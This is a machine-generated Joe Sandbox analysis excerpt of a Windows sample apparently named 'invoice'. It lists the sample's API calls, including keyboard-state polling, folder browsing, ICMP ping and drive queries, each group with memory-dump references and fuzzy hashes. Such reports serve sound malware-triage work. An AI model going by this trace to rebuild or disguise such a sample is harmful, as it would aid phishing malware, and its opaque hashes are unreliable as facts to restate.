                        • CoInitialize.OLE32(00000000), ref: 00FED676
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FED709
                        • SHGetDesktopFolder.SHELL32(?), ref: 00FED71D
                        • CoCreateInstance.OLE32(01012D7C,00000000,00000001,01038C1C,?), ref: 00FED769
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FED7D8
                        • CoTaskMemFree.OLE32(?,?), ref: 00FED830
                        • _memset.LIBCMT ref: 00FED86D
                        • SHBrowseForFolderW.SHELL32(?), ref: 00FED8A9
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FED8CC
                        • CoTaskMemFree.OLE32(00000000), ref: 00FED8D3
                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FED90A
                        • CoUninitialize.OLE32(00000001,00000000), ref: 00FED90C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                        • String ID:
                        • API String ID: 1246142700-0
                        • Opcode ID: d16f0dcfbed63a9dc503d4ed3f890518b960ade6c3534211ca13a0982c921d8e
                        • Instruction ID: 317d312c15311e539a8549e8893c79ec02b4870d3aa0bb1c03c7ede81e02c8eb
                        • Opcode Fuzzy Hash: d16f0dcfbed63a9dc503d4ed3f890518b960ade6c3534211ca13a0982c921d8e
                        • Instruction Fuzzy Hash: 9CB1FA75A00109AFDB14EFA5CC88DAEBBB9FF88314B148059F809EB251DB35EE41DB50
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00FE03C8
                        • SetKeyboardState.USER32(?), ref: 00FE0433
                        • GetAsyncKeyState.USER32(000000A0), ref: 00FE0453
                        • GetKeyState.USER32(000000A0), ref: 00FE046A
                        • GetAsyncKeyState.USER32(000000A1), ref: 00FE0499
                        • GetKeyState.USER32(000000A1), ref: 00FE04AA
                        • GetAsyncKeyState.USER32(00000011), ref: 00FE04D6
                        • GetKeyState.USER32(00000011), ref: 00FE04E4
                        • GetAsyncKeyState.USER32(00000012), ref: 00FE050D
                        • GetKeyState.USER32(00000012), ref: 00FE051B
                        • GetAsyncKeyState.USER32(0000005B), ref: 00FE0544
                        • GetKeyState.USER32(0000005B), ref: 00FE0552
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                        • Instruction ID: a9f58c313e79120955c437b9a6738fc95db125c154c6db8efc5a465255135e6c
                        • Opcode Fuzzy Hash: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                        • Instruction Fuzzy Hash: 2851C930D087C91AFB35DB6289107AEBFB49F11390F4C459995C2561C3DEA49ACCDB61
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 00FDC545
                        • GetWindowRect.USER32(00000000,?), ref: 00FDC557
                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FDC5B5
                        • GetDlgItem.USER32(?,00000002), ref: 00FDC5C0
                        • GetWindowRect.USER32(00000000,?), ref: 00FDC5D2
                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FDC626
                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC634
                        • GetWindowRect.USER32(00000000,?), ref: 00FDC645
                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FDC688
                        • GetDlgItem.USER32(?,000003EA), ref: 00FDC696
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FDC6B3
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00FDC6C0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                        • Instruction ID: 4de1aa8737063d08814e0fc356b4fbea059fba9d97dc3cf253e3359a43ea06cc
                        • Opcode Fuzzy Hash: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                        • Instruction Fuzzy Hash: 5D513171B00206ABDB28CF79DD85B6EBBBAFB88310F148129F519D7294DB719D00DB50
                        APIs
                          • Part of subcall function 00F81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F82036,?,00000000,?,?,?,?,00F816CB,00000000,?), ref: 00F81B9A
                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F820D3
                        • KillTimer.USER32(-00000001,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00F8216E
                        • DestroyAcceleratorTable.USER32(00000000), ref: 00FBBE26
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBE57
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBE6E
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBE8A
                        • DeleteObject.GDI32(00000000), ref: 00FBBE9C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: a651dd2909d61caf698cff46fe13c308429c4f0a5593a839a5354c15e5b5978e
                        • Instruction ID: e595c1561e1dbb63f87ef2dd4311e7e1c6436a175aa04369cc7ded495fd9cbc2
                        • Opcode Fuzzy Hash: a651dd2909d61caf698cff46fe13c308429c4f0a5593a839a5354c15e5b5978e
                        • Instruction Fuzzy Hash: 4C61AB35900A01DFDB36AF15D988BA9B7F1FF40322F20852CE5829A564C77AB881EF50
                        APIs
                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                        • GetSysColor.USER32(0000000F), ref: 00F821D3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: d59fef979492450ff141f4bce574a01e66a6796a74c28502eddd1d2fedeef38e
                        • Instruction ID: 65fc9dcc9e7a92281d1eee6a5c3fd853308e55177d040b6f74e665886aa5a2a9
                        • Opcode Fuzzy Hash: d59fef979492450ff141f4bce574a01e66a6796a74c28502eddd1d2fedeef38e
                        • Instruction Fuzzy Hash: 8041B2315005409BEB726F28EC88BF93B65EB06731F144365FDA58A1E5C7369C42FB61
                        APIs
                        • CharLowerBuffW.USER32(?,?,0100F910), ref: 00FEA995
                        • GetDriveTypeW.KERNEL32(00000061,010389A0,00000061), ref: 00FEAA5F
                        • _wcscpy.LIBCMT ref: 00FEAA89
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharDriveLowerType_wcscpy
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2820617543-1000479233
                        • Opcode ID: 131ce7c69ed85e0d0e78740fc7f0707e234737761f84937ea6759c66f63c0f18
                        • Instruction ID: 17671694534645fb23b21c8b59ee65e8621def1640acffb62c6534ed6d5569d9
                        • Opcode Fuzzy Hash: 131ce7c69ed85e0d0e78740fc7f0707e234737761f84937ea6759c66f63c0f18
                        • Instruction Fuzzy Hash: 6A51ED315083419BC314EF15CCD1AAEB7A9FF81B10F14492EF4925B2A2DB38E909EB53
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __i64tow__itow__swprintf
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 421087845-2263619337
                        • Opcode ID: 71d9a20bfac28be8ecdf2a70cc0d28bd701a99a1ae63bb908df115a2c0f1664f
                        • Instruction ID: cca01cb5579fa21f5b0b0792bd2923d3fd1db3e581667929ddf1d895bc640bb3
                        • Opcode Fuzzy Hash: 71d9a20bfac28be8ecdf2a70cc0d28bd701a99a1ae63bb908df115a2c0f1664f
                        • Instruction Fuzzy Hash: B5412772A08205AFDB24AF35DC42FB673E8EF45310F24446EF049D7251EA75D901EB10
                        APIs
                        • _memset.LIBCMT ref: 0100719C
                        • CreateMenu.USER32 ref: 010071B7
                        • SetMenu.USER32(?,00000000), ref: 010071C6
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01007253
                        • IsMenu.USER32(?), ref: 01007269
                        • CreatePopupMenu.USER32 ref: 01007273
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010072A0
                        • DrawMenuBar.USER32 ref: 010072A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                        • String ID: 0$F
                        • API String ID: 176399719-3044882817
                        • Opcode ID: 59c25d8c92cbe3eddc9fa068fa7ea64d7ea398bbb8d90bd475bf0c7a43534e48
                        • Instruction ID: be8eb650bb52de3abc961c323b760e4d7ae880e0e31656023995975378fc92de
                        • Opcode Fuzzy Hash: 59c25d8c92cbe3eddc9fa068fa7ea64d7ea398bbb8d90bd475bf0c7a43534e48
                        • Instruction Fuzzy Hash: 28416D74A01205EFEB21DF68D884A9A7BF9FF49300F144169FE85A7390D736A910DFA0
                        APIs
                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01007590
                        • CreateCompatibleDC.GDI32(00000000), ref: 01007597
                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 010075AA
                        • SelectObject.GDI32(00000000,00000000), ref: 010075B2
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 010075BD
                        • DeleteDC.GDI32(00000000), ref: 010075C6
                        • GetWindowLongW.USER32(?,000000EC), ref: 010075D0
                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010075E4
                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010075F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                        • String ID: static
                        • API String ID: 2559357485-2160076837
                        • Opcode ID: a6ef3d225d3261474a4dbc4a9054d5822e80da515c117434a2f57a1d91a77d5e
                        • Instruction ID: 225403eafade4c5bdbe676294649d723774c841dfb6e7b28483f59889edfafa6
                        • Opcode Fuzzy Hash: a6ef3d225d3261474a4dbc4a9054d5822e80da515c117434a2f57a1d91a77d5e
                        • Instruction Fuzzy Hash: 03316F71100116BBEF239F68DC08FDA3BA9FF09721F110214FA95A61D0CB7AE851EB64
                        APIs
                        • _memset.LIBCMT ref: 00FA6FBB
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        • __gmtime64_s.LIBCMT ref: 00FA7054
                        • __gmtime64_s.LIBCMT ref: 00FA708A
                        • __gmtime64_s.LIBCMT ref: 00FA70A7
                        • __allrem.LIBCMT ref: 00FA70FD
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA7119
                        • __allrem.LIBCMT ref: 00FA7130
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA714E
                        • __allrem.LIBCMT ref: 00FA7165
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA7183
                        • __invoke_watson.LIBCMT ref: 00FA71F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                        • String ID:
                        • API String ID: 384356119-0
                        • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                        • Instruction ID: bf3fd6af1165751c994b8c68590cb42c64debd4acd80e04799e3041d5c2b097e
                        • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                        • Instruction Fuzzy Hash: 8471D7F2E00716ABE714AE69CC41F9AB3E8AF56334F14412AF514D7281F774EA40AB90
                        APIs
                        • _memset.LIBCMT ref: 00FE283A
                        • GetMenuItemInfoW.USER32(01045890,000000FF,00000000,00000030), ref: 00FE289B
                        • SetMenuItemInfoW.USER32(01045890,00000004,00000000,00000030), ref: 00FE28D1
                        • Sleep.KERNEL32(000001F4), ref: 00FE28E3
                        • GetMenuItemCount.USER32(?), ref: 00FE2927
                        • GetMenuItemID.USER32(?,00000000), ref: 00FE2943
                        • GetMenuItemID.USER32(?,-00000001), ref: 00FE296D
                        • GetMenuItemID.USER32(?,?), ref: 00FE29B2
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FE29F8
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2A0C
                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2A2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                        • String ID:
                        • API String ID: 4176008265-0
                        • Opcode ID: 37fd6b7f3b11b0a4c9373b0caaa1ad4461bca07f110f616513464e849df936f3
                        • Instruction ID: 4cdc13b4b39acbc3b202f08bef06b99d09f48ae0d4323e30d8376ea0a9a87187
                        • Opcode Fuzzy Hash: 37fd6b7f3b11b0a4c9373b0caaa1ad4461bca07f110f616513464e849df936f3
                        • Instruction Fuzzy Hash: 9061A0B0900289AFDB71CF65CD88AAE7BBDEB05714F140159F842A3245E73AAD05FB61
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01006FD7
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01006FDA
                        • GetWindowLongW.USER32(?,000000F0), ref: 01006FFE
                        • _memset.LIBCMT ref: 0100700F
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01007021
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01007099
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow_memset
                        • String ID:
                        • API String ID: 830647256-0
                        • Opcode ID: ce8717b0a8dd544469ab2be0b585b49a7cdd4de685e12d61fe33914449a54aa4
                        • Instruction ID: 1f521f2ebecd47aca51554609afcc05d4c4197acde563f3b4f00e74933c2fe24
                        • Opcode Fuzzy Hash: ce8717b0a8dd544469ab2be0b585b49a7cdd4de685e12d61fe33914449a54aa4
                        • Instruction Fuzzy Hash: 18618F75A00208EFEB21DFA8CC80EEE77F9EB09700F100199FA94AB2D1C775A951DB50
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FD6F15
                        • SafeArrayAllocData.OLEAUT32(?), ref: 00FD6F6E
                        • VariantInit.OLEAUT32(?), ref: 00FD6F80
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FD6FA0
                        • VariantCopy.OLEAUT32(?,?), ref: 00FD6FF3
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FD7007
                        • VariantClear.OLEAUT32(?), ref: 00FD701C
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00FD7029
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD7032
                        • VariantClear.OLEAUT32(?), ref: 00FD7044
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD704F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: 65e728be7a1aa52b8f82dec0d39f158b2f896c5d5a5ba1a1ac82c0a39aa746cf
                        • Instruction ID: eb7201ab1887f0e9ba9aa1d2d8c00a16ceaafc6533fbd5c5028664c5bc225b41
                        • Opcode Fuzzy Hash: 65e728be7a1aa52b8f82dec0d39f158b2f896c5d5a5ba1a1ac82c0a39aa746cf
                        • Instruction Fuzzy Hash: 9B41A1319002199FCB21EFA4D8889EDBBB9FF08314F05802AF945E7351DB35A945EF90
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00FF58A9
                        • inet_addr.WSOCK32(?), ref: 00FF58EE
                        • gethostbyname.WSOCK32(?), ref: 00FF58FA
                        • IcmpCreateFile.IPHLPAPI ref: 00FF5908
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF5978
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF598E
                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00FF5A03
                        • WSACleanup.WSOCK32 ref: 00FF5A09
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: d55eac5c9c17622e8f93585aad2830b367abc7534b868ecbd2dfb478bbbf9a81
                        • Instruction ID: c4cdb20cf2bcc929e584cb79ad4d76ed0c97383ed13a2b5c5b2424d9f46a8194
                        • Opcode Fuzzy Hash: d55eac5c9c17622e8f93585aad2830b367abc7534b868ecbd2dfb478bbbf9a81
                        • Instruction Fuzzy Hash: 44518131604701DFD725AF24CC49B7A77E4EF49B20F144529FA96DB2A1DBB4E900EB42
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEB55C
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FEB5D2
                        • GetLastError.KERNEL32 ref: 00FEB5DC
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00FEB649
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: e69771e72d166c0382b527ed935037979ab6e343e93fd14c17185deca55f1e2f
                        • Instruction ID: d25a30b195b27e9f2fd9a3e2d24a3f78f37b6cd13e84b12b517feab8c5d26505
                        • Opcode Fuzzy Hash: e69771e72d166c0382b527ed935037979ab6e343e93fd14c17185deca55f1e2f
                        • Instruction Fuzzy Hash: 1131B235A0024A9FCB15EFA6CC85EFE77B8EF44310F14819AF501DB291DB759A41EB90
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FD92D6
                        • GetDlgCtrlID.USER32 ref: 00FD92E1
                        • GetParent.USER32 ref: 00FD92FD
